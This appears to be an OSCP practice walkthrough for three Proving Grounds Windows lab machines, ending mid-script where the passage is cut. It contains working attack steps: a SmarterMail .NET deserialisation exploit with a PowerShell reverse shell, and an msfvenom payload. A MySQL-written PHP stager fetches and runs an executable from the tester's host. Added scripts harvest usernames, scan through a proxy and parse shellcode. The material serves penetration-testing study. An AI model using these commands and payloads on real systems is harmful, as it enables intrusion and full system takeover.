---
title: '[OSCP, PEN-200] Proving Grounds Practice - Windows'
disqus: hackmd
---

[OSCP, PEN-200] Proving Grounds Practice - Windows
===

# Table of Contents
[TOC]

# Algernon
![image](https://hackmd.io/_uploads/B1WUVl3h1l.png)

## Solution
### 1. Recon
#### 1.1 Nmap
```
┌──(chw㉿CHW)-[~]
└─$ nmap -sC -sV -T4 -p- 192.168.133.65
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-22 02:26 EDT
Warning: 192.168.133.65 giving up on port because retransmission cap hit (6).
Stats: 0:05:32 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 44.12% done; ETC: 02:39 (0:07:00 remaining)
Nmap scan report for 192.168.133.65
Host is up (0.096s latency).
Not shown: 65486 closed tcp ports (reset), 35 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-29-20  10:31PM       <DIR>          ImapRetrieval
| 03-21-25  11:25PM       <DIR>          Logs
| 04-29-20  10:31PM       <DIR>          PopRetrieval
|_04-29-20  10:32PM       <DIR>          Spool
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
9998/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was /interface/root
|_http-server-header: Microsoft-IIS/10.0
| uptime-agent-info: HTTP/1.1 400 Bad Request\x0D
|   Content-Type: text/html; charset=us-ascii\x0D
|   Server: Microsoft-HTTPAPI/2.0\x0D
|   Date: Sat, 22 Mar 2025 06:42:18 GMT\x0D
|   Connection: close\x0D
|   Content-Length: 326\x0D
|   \x0D
|   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">\x0D
|   <HTML><HEAD><TITLE>Bad Request</TITLE>\x0D
|   <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>\x0D
|   <BODY><h2>Bad Request - Invalid Verb</h2>\x0D
|   <hr><p>HTTP Error 400. The request verb is invalid.</p>\x0D
|_  </BODY></HTML>\x0D
17001/tcp open  remoting      MS .NET Remoting services
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2025-03-22T06:42:18
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 943.43 seconds
```
> HTTP, FTP, NetBIOS. The web UI on 9998 (`/interface/root`) is a SmarterMail login page, the anonymous FTP root is SmarterMail's data directory (`ImapRetrieval`, `PopRetrieval`, `Spool`, `Logs`), and 17001 is SmarterMail's .NET Remoting service, which is what step 4 ends up targeting.

http://192.168.133.65/\
![image](https://hackmd.io/_uploads/ryCf-xhhke.png)\
http://192.168.133.65:9998/interface/root#/login\
![image](https://hackmd.io/_uploads/SJqIbln2kl.png)

#### 1.2 Dirb
```
┌──(chw㉿CHW)-[~]
└─$ dirb http://192.168.133.65/
...
==> DIRECTORY: http://192.168.133.65/aspnet_client/
...
==> DIRECTORY: http://192.168.133.65/aspnet_client/system_web/
...
```
> Nothing of interest.

### 2. FTP
```
┌──(chw㉿CHW)-[~]
└─$ ftp anonymous@192.168.133.65 21
Connected to 192.168.133.65.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49762|)
150 Opening ASCII mode data connection.
04-29-20  10:31PM       <DIR>          ImapRetrieval
03-22-25  01:10AM       <DIR>          Logs
04-29-20  10:31PM       <DIR>          PopRetrieval
04-29-20  10:32PM       <DIR>          Spool
```
> Too many files to read one by one; mirror the whole tree locally with `wget`.
```
┌──(chw㉿CHW)-[~]
└─$ wget -r ftp://Anonymous@192.168.133.65
...

┌──(chw㉿CHW)-[~]
└─$ cd 192.168.133.65

┌──(chw㉿CHW)-[~/192.168.133.65]
└─$ ls
ImapRetrieval  Logs  PopRetrieval  Spool

┌──(chw㉿CHW)-[~/192.168.133.65]
└─$ tree
.
├── ImapRetrieval
├── Logs
│   ├── 2020.04.29-delivery.log
│   ├── 2020.04.29-profiler.log
│   ├── 2020.04.29-smtpLog.log
│   ├── 2020.04.29-xmppLog.log
│   ├── 2020.05.12-administrative.log
│   ├── ...
│   ├── 2025.01.06-xmppLog.log
│   └── 2025.03.22-delivery.log
├── PopRetrieval
└── Spool
    └── Drop
```

### 3. Log analysis
```
┌──(chw㉿CHW)-[~/192.168.133.65]
└─$ cd Logs

┌──(chw㉿CHW)-[~/192.168.133.65/Logs]
└─$ cat *
...
23:26:57.040 xmpp Stopped at 4/29/2020 11:26:57 PM
03:35:45.726 [192.168.118.6] User @ calling create primary system admin, username: admin
03:35:47.054 [192.168.118.6] Webmail Attempting to login user: admin
03:35:47.054 [192.168.118.6] Webmail Login successful: With user admin
03:35:55.820 [192.168.118.6] Webmail Attempting to login user: admin
03:35:55.820 [192.168.118.6] Webmail Login successful: With user admin
03:36:00.195 [192.168.118.6] User admin@ calling set setup wizard settings
03:36:08.242 [192.168.118.6] User admin@ logging out
...
```
> The administrative log shows the primary system admin being created during the setup wizard: webmail user `admin`. No password is logged, but the account name is confirmed.
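The `cat *` above works for a handful of files, but the `Logs` directory spans five years. The following Python script is an added example (not code from the original walkthrough) that does the same triage programmatically: it parses SmarterMail-style log lines, pulls out every account name, login attempt, admin action and source IP, and prints a summary. The sample lines embedded in it are the ones quoted above, so it runs offline; the regexes are written for that line format and are an assumption about the rest of the logs.

```python
"""Triage SmarterMail administrative logs pulled over anonymous FTP.

Added example for the Algernon walkthrough; not code from the original page.
The sample lines below are copied from the log excerpt shown in the
walkthrough and are the only input the script needs, so it runs offline.
"""
import re
from collections import Counter, defaultdict

# Constructed input: the lines quoted in the walkthrough.
SAMPLE_LOG = """\
23:26:57.040 xmpp Stopped at 4/29/2020 11:26:57 PM
03:35:45.726 [192.168.118.6] User @ calling create primary system admin, username: admin
03:35:47.054 [192.168.118.6] Webmail Attempting to login user: admin
03:35:47.054 [192.168.118.6] Webmail Login successful: With user admin
03:35:55.820 [192.168.118.6] Webmail Attempting to login user: admin
03:35:55.820 [192.168.118.6] Webmail Login successful: With user admin
03:36:00.195 [192.168.118.6] User admin@ calling set setup wizard settings
03:36:08.242 [192.168.118.6] User admin@ logging out
"""

# "HH:MM:SS.mmm [source-ip] message"; the bracketed source is optional.
LINE_RE = re.compile(
    r"^(?P<time>\d{2}:\d{2}:\d{2}\.\d{3}) (?:\[(?P<src>[^\]]+)\] )?(?P<msg>.*)$"
)
ADMIN_CREATE_RE = re.compile(r"create primary system admin, username: (?P<user>\S+)")
LOGIN_ATTEMPT_RE = re.compile(r"Attempting to login user: (?P<user>\S+)")
LOGIN_OK_RE = re.compile(r"Login successful: With user (?P<user>\S+)")
ACTOR_RE = re.compile(r"^User (?P<user>[^@\s]*)@ calling (?P<action>.+)$")


def parse_log(text):
    """Yield (time, source_ip, message) for each line that fits the format."""
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            yield m.group("time"), m.group("src"), m.group("msg")


def triage(text):
    """Collect what an attacker wants from the log: accounts, logins, sources, admin actions."""
    summary = {
        "created_admins": [],
        "login_attempts": Counter(),
        "login_successes": Counter(),
        "sources": Counter(),
        "admin_actions": defaultdict(list),
    }
    for _time, src, msg in parse_log(text):
        if src:
            summary["sources"][src] += 1
        if (m := ADMIN_CREATE_RE.search(msg)):
            summary["created_admins"].append(m.group("user"))
        elif (m := LOGIN_ATTEMPT_RE.search(msg)):
            summary["login_attempts"][m.group("user")] += 1
        elif (m := LOGIN_OK_RE.search(msg)):
            summary["login_successes"][m.group("user")] += 1
        elif (m := ACTOR_RE.match(msg)):
            summary["admin_actions"][m.group("user")].append(m.group("action"))
    return summary


def usernames(summary):
    """Every account name seen anywhere in the log, for later password guessing."""
    names = set(summary["created_admins"])
    names |= set(summary["login_attempts"]) | set(summary["login_successes"])
    names |= {u for u in summary["admin_actions"] if u}
    return sorted(names)


if __name__ == "__main__":
    s = triage(SAMPLE_LOG)
    print("accounts:", usernames(s))
    print("sources:", dict(s["sources"]))
    print("admin actions:", dict(s["admin_actions"]))
```

Point it at the mirrored directory with `triage(open(path).read())` per file and merge the counters; on a real engagement the `sources` counter is as useful as the usernames, since it tells you which host the administrator works from.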
### 4. searchsploit
No SmarterMail version string has turned up yet, so start by looking through the candidate exploits:
```
┌──(chw㉿CHW)-[~/192.168.133.65/Logs]
└─$ searchsploit Smartermail
---------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                              |  Path
---------------------------------------------------------------------------- ---------------------------------
SmarterMail 16 - Arbitrary File Upload                                      | multiple/webapps/48580.py
SmarterMail 7.1.3876 - Directory Traversal                                  | windows/remote/15048.txt
SmarterMail 7.3/7.4 - Multiple Vulnerabilities                              | asp/webapps/16955.txt
SmarterMail 8.0 - Multiple Cross-Site Scripting Vulnerabilities             | asp/webapps/16975.txt
SmarterMail < 7.2.3925 - LDAP Injection                                     | asp/webapps/15189.txt
SmarterMail < 7.2.3925 - Persistent Cross-Site Scripting                    | asp/webapps/15185.txt
SmarterMail Build 6985 - Remote Code Execution                              | windows/remote/49216.py
SmarterMail Enterprise and Standard 11.x - Persistent Cross-Site Scripting  | asp/webapps/31017.php
...
```
> Try 49216
> `SmarterMail .NET Remoting RCE (CVE-2019-7214)`: it attacks the .NET Remoting endpoint, which is exactly what nmap found on 17001.

Check how the exploit is used:
```
┌──(chw㉿CHW)-[~/192.168.133.65/Logs]
└─$ searchsploit -x 49216
  Exploit: SmarterMail Build 6985 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/49216
     Path: /usr/share/exploitdb/exploits/windows/remote/49216.py
    Codes: CVE-2019-7214
 Verified: False
File Type: Python script, ASCII text executable, with very long lines (4852)

# Exploit Title: SmarterMail Build 6985 - Remote Code Execution
# Exploit Author: 1F98D
# Original Author: Soroush Dalili
# Date: 10 May 2020
# Vendor Hompage: re
# CVE: CVE-2019-7214
# Tested on: Windows 10 x64
# References:
# https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
#
# SmarterMail before build 6985 provides a .NET remoting endpoint
# which is vulnerable to a .NET deserialisation attack.
#
#!/usr/bin/python3
```
> The listing says `Verified: False`, so read the script before running it: it is a .NET deserialisation payload delivered over the Remoting port, and the only things to change are the target and the callback.

### 5. Exploit
Edit the target and callback values at the top of the script (`HOST`, `PORT`, `LHOST`, `LPORT`), then run it:
```
┌──(chw㉿CHW)-[~/192.168.133.65]
└─$ cat 49216.py
...
import base64
import socket
import sys
from struct import pack

HOST='192.168.133.65'
PORT=17001
LHOST='192.168.45.165'
LPORT=8888

psh_shell = '$client = ...

┌──(chw㉿CHW)-[~/192.168.133.65]
└─$ python3 49216.py
```
(Kali)
```
┌──(chw㉿CHW)-[~/192.168.133.65]
└─$ nc -nvlp 8888
listening on [any] 8888 ...
connect to [192.168.45.165] from (UNKNOWN) [192.168.133.65] 50020
PS C:\Windows\system32> hostname
algernon
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>
```
> The payload is a PowerShell reverse shell, and it lands as `NT AUTHORITY\SYSTEM` straight away because the SmarterMail service itself runs as SYSTEM; no privilege escalation step is needed.

### ✅ Get Root FLAG
> Root flag in `C:\Users\Administrator\Desktop`

# Squid
![image](https://hackmd.io/_uploads/rk2UCxhnJx.png)

## Solution
### 1. Recon
#### 1.1 Nmap
```
┌──(chw㉿CHW)-[~]
└─$ nmap -sC -sV -T4 -p- 192.168.133.189
...
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE SERVICE    VERSION
135/tcp   open  msrpc      Microsoft Windows RPC
139/tcp   open  netbios-ssn Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3128/tcp  open  http-proxy Squid http proxy 4.14
|_http-title: ERROR: The requested URL could not be retrieved
49666/tcp open  msrpc      Microsoft Windows RPC
49667/tcp open  msrpc      Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2025-03-22T09:15:27
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 354.50 seconds
```
> HTTP proxy (Squid 4.14), RPC, SMB.

### 2. enum4linux & smbclient
```
┌──(chw㉿CHW)-[~]
└─$ enum4linux -a 192.168.133.189

┌──(chw㉿CHW)-[~]
└─$ smbclient -N -L \\\\192.168.133.189\\
session setup failed: NT_STATUS_ACCESS_DENIED
```
> Nothing usable from either.
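With SMB closed to anonymous access, the only other service is the Squid proxy on 3128, and the next step scans the host through it with spose. The script below is an added example (not code from the original walkthrough and not spose's code) of the idea in plain Python: ask the proxy for `http://target:port/` and read the verdict off the proxy's reply. A target that speaks HTTP answers itself; when the connection behind the proxy fails, Squid generates an error page carrying an `X-Squid-Error` header, and the error name distinguishes a closed port (`ERR_CONNECT_FAIL`) from an ACL refusal (`ERR_ACCESS_DENIED`) or a port that accepted the connection but did not talk HTTP (anything else, which is how a MySQL listener shows up). Those header values are assumptions about Squid's stock error pages, which is why the classifier is a separate function exercised against constructed replies.

```python
"""Probe ports behind an HTTP forward proxy (Squid) by asking it to fetch http://target:port/.

Added example for the Squid walkthrough; not code from the page or from spose.
classify_response() works on constructed replies so the logic can be checked
offline; probe() and scan() do the same over a real socket.
"""
import socket

# Constructed Squid/upstream replies, one per outcome the classifier distinguishes.
SAMPLE_RESPONSES = {
    "web server answered": b"HTTP/1.1 200 OK\r\nServer: Apache/2.4.46 (Win64)\r\n\r\n<html>...",
    "closed port": b"HTTP/1.1 503 Service Unavailable\r\nX-Squid-Error: ERR_CONNECT_FAIL 111\r\n\r\n",
    "non-HTTP service": b"HTTP/1.1 502 Bad Gateway\r\nX-Squid-Error: ERR_INVALID_RESP 0\r\n\r\n",
    "blocked by proxy ACL": b"HTTP/1.1 403 Forbidden\r\nX-Squid-Error: ERR_ACCESS_DENIED 0\r\n\r\n",
}


def build_request(target, port):
    """Absolute-URI GET: the form that tells a forward proxy where to connect."""
    return (
        f"GET http://{target}:{port}/ HTTP/1.1\r\n"
        f"Host: {target}:{port}\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def parse_headers(raw):
    """Return (status_code, {lower-cased header: value}) from a raw HTTP reply."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1", "replace")
    lines = head.split("\r\n")
    status = lines[0].split()
    code = status[1] if len(status) >= 2 and status[0].startswith("HTTP/") else None
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return code, headers


def classify_response(raw):
    """Map a reply to open / closed / denied / unknown based on Squid's error header."""
    code, headers = parse_headers(raw)
    if code is None:
        return "unknown"
    err = headers.get("x-squid-error", "")
    if err.startswith("ERR_CONNECT_FAIL"):
        return "closed"        # Squid tried to connect and could not (refused or timed out)
    if err.startswith(("ERR_ACCESS_DENIED", "ERR_FORWARDING_DENIED")):
        return "denied"        # proxy ACL blocked it; says nothing about the port
    # Either the target answered HTTP itself (no Squid error at all) or Squid
    # connected and then choked on a non-HTTP reply; both mean something listens.
    return "open"


def probe(proxy, target, port, timeout=5.0):
    """Send one request through proxy=(host, port) and classify the reply."""
    try:
        with socket.create_connection(proxy, timeout=timeout) as s:
            s.sendall(build_request(target, port))
            data = b""
            while b"\r\n\r\n" not in data:
                chunk = s.recv(4096)
                if not chunk:
                    break
                data += chunk
    except OSError:
        return "unknown"
    return classify_response(data)


def scan(proxy, target, ports):
    """Return {port: verdict}; both 'open' and 'denied' are worth a second look."""
    return {p: probe(proxy, target, p) for p in ports}


if __name__ == "__main__":
    for label, reply in SAMPLE_RESPONSES.items():
        print(f"{label:22s} -> {classify_response(reply)}")
    # Live use against the lab box (addresses from the walkthrough):
    # print(scan(("192.168.133.189", 3128), "192.168.133.189", [80, 3306, 8080]))
```

Scanning the proxy's own address is the whole trick here: the request leaves Squid from the loopback side of the firewall, so ports that nmap reported as filtered (3306, 8080) become reachable.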
### 3. http-proxy scanner
Rescan the host through its own proxy with [spose](https://github.com/aancw/spose):
```
┌──(chw㉿CHW)-[~/Tools]
└─$ git clone https://github.com/aancw/spose.git

┌──(chw㉿CHW)-[~/Tools/spose_http-proxy-scanner]
└─$ python3 spose.py --proxy http://192.168.133.189:3128 --target 192.168.133.189
Scanning default common ports
Using proxy address http://192.168.133.189:3128
192.168.133.189:3306 seems OPEN
192.168.133.189:8080 seems OPEN
```
> 3306 (MySQL) and 8080 are open behind the proxy.

#### 3.1 Browser through the proxy
Point the browser at the box's proxy:\
![image](https://hackmd.io/_uploads/BJz0f-3h1l.png)

Browse to 192.168.133.189:8080:\
![image](https://hackmd.io/_uploads/Hk1FFW3nJl.png)
> WampServer 3.2.3\
> ![image](https://hackmd.io/_uploads/HJ4_hb33yl.png)

### 4. Dirb with proxy
```
┌──(chw㉿CHW)-[~]
└─$ dirb http://192.168.133.189:8080/ -p 192.168.133.189:3128
```
> Brute-forcing is not really needed: the WampServer page on 192.168.133.189:8080 already links to `phpinfo()` and `phpMyAdmin`.

### 5. phpMyAdmin
http://192.168.133.189:8080/phpmyadmin/index.php\
![image](https://hackmd.io/_uploads/SJFkJGhhyx.png)
> admin:admin (failed)
> root:(empty password) (success?!)

Browse the databases:
- user
![image](https://hackmd.io/_uploads/H1xq1z321g.png)

Goal: use the database to write a reverse shell to disk. `phpinfo()` gives the install path, `C:\wamp`, so the web root is `C:\wamp\www`.\
![image](https://hackmd.io/_uploads/SkvAWzn21e.png)

### 6. Reverse Shell
#### 6.1 Build the reverse shell binary
```
┌──(chw㉿CHW)-[~]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.165 LPORT=8888 -f exe -o chw_windows.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: chw_windows.exe

┌──(chw㉿CHW)-[~]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```
#### 6.2 Drop a PHP stager through MySQL
Run the following in the phpMyAdmin SQL tab. It writes a one-line PHP file into the web root that, when requested, downloads the executable from Kali and starts it:
```
SELECT "<?php system('powershell -c \"Invoke-WebRequest -Uri http://192.168.45.165/chw_windows.exe -OutFile C:\\windows\\temp\\rs.exe; Start-Process C:\\windows\\temp\\rs.exe\"'); ?>" INTO OUTFILE "C:/wamp/www/rev.php"
```
![image](https://hackmd.io/_uploads/B1I7wG2n1g.png)\
> `INTO OUTFILE` only works because the MySQL account has the `FILE` privilege and `secure_file_priv` does not restrict the output path; if the write fails, check `SELECT @@secure_file_priv;` first.

(Kali)\
Start the listener, then request the dropped file:
```
┌──(chw㉿CHW)-[~]
└─$ nc -nvlp 8888
listening on [any] 8888 ...
```
Browse to http://192.168.133.189:8080/rev.php (through the proxy).

### 7. Shell
```
┌──(chw㉿CHW)-[~]
└─$ nc -nvlp 8888
listening on [any] 8888 ...
connect to [192.168.45.165] from (UNKNOWN) [192.168.133.189] 50486
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\wamp\www>hostname
hostname
SQUID

C:\wamp\www>whoami
whoami
nt authority\system
```
>[!Note]
>Already `nt authority\system`?! The WAMP Apache service is running as LocalSystem, so the web shell inherits it. This is probably not the intended route, and the user flag still has to be collected.

### ✅ Get User Flag
> User flag in `C:\`

### ✅ Get Root FLAG
> Root flag in `C:\Users\Administrator\Desktop`

# Internal
![image](https://hackmd.io/_uploads/SyutNm3hyl.png)

## Solution
### 1. Recon
#### 1.1 Nmap
```
┌──(chw㉿CHW)-[~]
└─$ nmap -sC -sV -T4 -p- 192.168.133.40
...
PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Microsoft DNS 6.0.6001 (17714650) (Windows Server 2008 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.0.6001 (17714650)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds  Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
2460/tcp  filtered ms-theater
3389/tcp  open     ms-wbt-server Microsoft Terminal Service
| rdp-ntlm-info:
|   Target_Name: INTERNAL
|   NetBIOS_Domain_Name: INTERNAL
|   NetBIOS_Computer_Name: INTERNAL
|   DNS_Domain_Name: internal
|   DNS_Computer_Name: internal
|   Product_Version: 6.0.6001
|_  System_Time: 2025-03-22T12:12:08+00:00
| ssl-cert: Subject: commonName=internal
| Not valid before: 2025-01-05T19:52:51
|_Not valid after:  2025-07-07T19:52:51
|_ssl-date: 2025-03-22T12:12:16+00:00; 0s from scanner time.
5357/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
6543/tcp  filtered mythtv
13216/tcp filtered bcslogc
13872/tcp filtered unknown
14657/tcp filtered unknown
15075/tcp filtered unknown
26509/tcp filtered unknown
28182/tcp filtered unknown
33705/tcp filtered unknown
37351/tcp filtered unknown
37998/tcp filtered unknown
43864/tcp filtered unknown
44421/tcp filtered unknown
49152/tcp open     msrpc         Microsoft Windows RPC
49153/tcp open     msrpc         Microsoft Windows RPC
49154/tcp open     msrpc         Microsoft Windows RPC
49155/tcp open     msrpc         Microsoft Windows RPC
49156/tcp open     msrpc         Microsoft Windows RPC
49157/tcp open     msrpc         Microsoft Windows RPC
49158/tcp open     msrpc         Microsoft Windows RPC
51714/tcp filtered unknown
52362/tcp filtered unknown
58509/tcp filtered unknown
61842/tcp filtered unknown
63645/tcp filtered unknown
64131/tcp filtered unknown
Service Info: Host: INTERNAL; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008::sp1, cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2

Host script results:
| smb2-time:
|   date: 2025-03-22T12:12:08
|_  start_date: 2025-02-20T21:30:47
| smb-os-discovery:
|   OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: internal
|   NetBIOS computer name: INTERNAL\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-03-22T05:12:08-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h24m00s, deviation: 3h07m50s, median: 0s
| smb2-security-mode:
|   2:0:2:
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: INTERNAL, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ab:fb:ab (VMware)
...
```
> DNS, SMB, RPC, RDP on an unpatched-looking Windows Server 2008 SP1 (build 6001).

#### 1.2 enum4linux & smbclient
```
┌──(chw㉿CHW)-[~]
└─$ enum4linux -a 192.168.133.40
...
 ===========================( Enumerating Workgroup/Domain on 192.168.133.40 )===========================
[+] Got domain/workgroup name: WORKGROUP

 ===============================( Nbtstat Information for 192.168.133.40 )===============================
Looking up status of 192.168.133.40
        INTERNAL        <00> -         B <ACTIVE>  Workstation Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        INTERNAL        <20> -         B <ACTIVE>  File Server Service

        MAC Address = 00-50-56-AB-FB-AB
...
 ================================( Share Enumeration on 192.168.133.40 )================================
do_connect: Connection to 192.168.133.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.133.40

┌──(chw㉿CHW)-[~]
└─$ smbclient -L //192.168.133.40/ -N
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.133.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(chw㉿CHW)-[~]
└─$ rpcclient -U '' -N 192.168.133.40
rpcclient $> enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> netshareenum
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaquery
do_cmd: Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> getdompwinfo
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
```
> Nothing usable from any of them.

### 1.3 DNS
Add the hostname to `/etc/hosts`:
```
┌──(chw㉿CHW)-[~]
└─$ cat /etc/hosts
192.168.133.40  Internal
...

┌──(chw㉿CHW)-[~]
└─$ ping Internal
PING Internal (192.168.133.40) 56(84) bytes of data.
64 bytes from Internal (192.168.133.40): icmp_seq=1 ttl=125 time=107 ms
64 bytes from Internal (192.168.133.40): icmp_seq=2 ttl=125 time=140 ms
```

### 1.4 Nmap scripts
Nothing obviously exploitable so far, so run the `smb-vuln*` NSE scripts against port 445:
```
┌──(chw㉿CHW)-[~]
└─$ nmap -p 445 --script smb-vuln* 192.168.133.40
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-22 08:43 EDT
Nmap scan report for Internal (192.168.133.40)
Host is up (0.13s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: EOF
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|
|     Disclosure date: 2009-09-08
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103

Nmap done: 1 IP address (1 host up) scanned in 25.64 seconds
```
> The host is vulnerable to CVE-2009-3103 (SMBv2 negotiate, MS09-050). This is a kernel bug in `srv2.sys`: a bad payload crashes the box rather than failing quietly, so get the shellcode right before firing.

### 2. Exploit DB
Search [exploit-db](https://www.exploit-db.com/) for the CVE:
![image](https://hackmd.io/_uploads/S1NYoBn31e.png)
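The exploit-db script used below carries its shellcode as a hardcoded buffer, and the next step pastes fresh msfvenom output into it by hand. Because a wrong callback address here costs a kernel crash, the following added example (not code from the walkthrough or from the exploit) converts msfvenom's `-f c` array into Python bytes and reads back the IP and port a Metasploit x86 `reverse_tcp` stager will connect to. The stager builds its `sockaddr_in` with `push <ip>; push <AF_INET | port>`, which is the byte pattern the check looks for. The sample is a constructed excerpt of the C array shown in the next section: only the three lines around that push sequence are included, because they are all the check needs.

```python
"""Convert msfvenom `-f c` output to Python bytes and verify the stager's callback target.

Added example for the Internal walkthrough; not code from the page or from the exploit.
"""
import re
import socket
import struct

# Constructed input: three lines excerpted from the msfvenom `-f c` output in section 3.
SAMPLE_C_ARRAY = r'''
unsigned char buf[] =
"\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80"
"\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x2d\xb2\x68\x02\x00"
"\x22\xb8\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea";
'''


def c_array_to_bytes(text):
    """Collect every \\xNN escape inside the quoted C string literals into one bytes object."""
    body = "".join(re.findall(r'"((?:\\x[0-9a-fA-F]{2})*)"', text))
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", body))


def to_python_literal(blob, width=16):
    """Render bytes as the `buf += b"..."` lines an old Python exploit expects."""
    lines = []
    for i in range(0, len(blob), width):
        chunk = "".join(f"\\x{b:02x}" for b in blob[i:i + width])
        lines.append(f'buf += b"{chunk}"')
    return "\n".join(lines)


# push imm32 <ip> ; push imm32 <0x0002 = AF_INET in the low word, port big-endian in the high word>
SOCKADDR_RE = re.compile(rb"\x68(?P<ip>.{4})\x68\x02\x00(?P<port>.{2})", re.DOTALL)


def find_reverse_tcp_target(blob):
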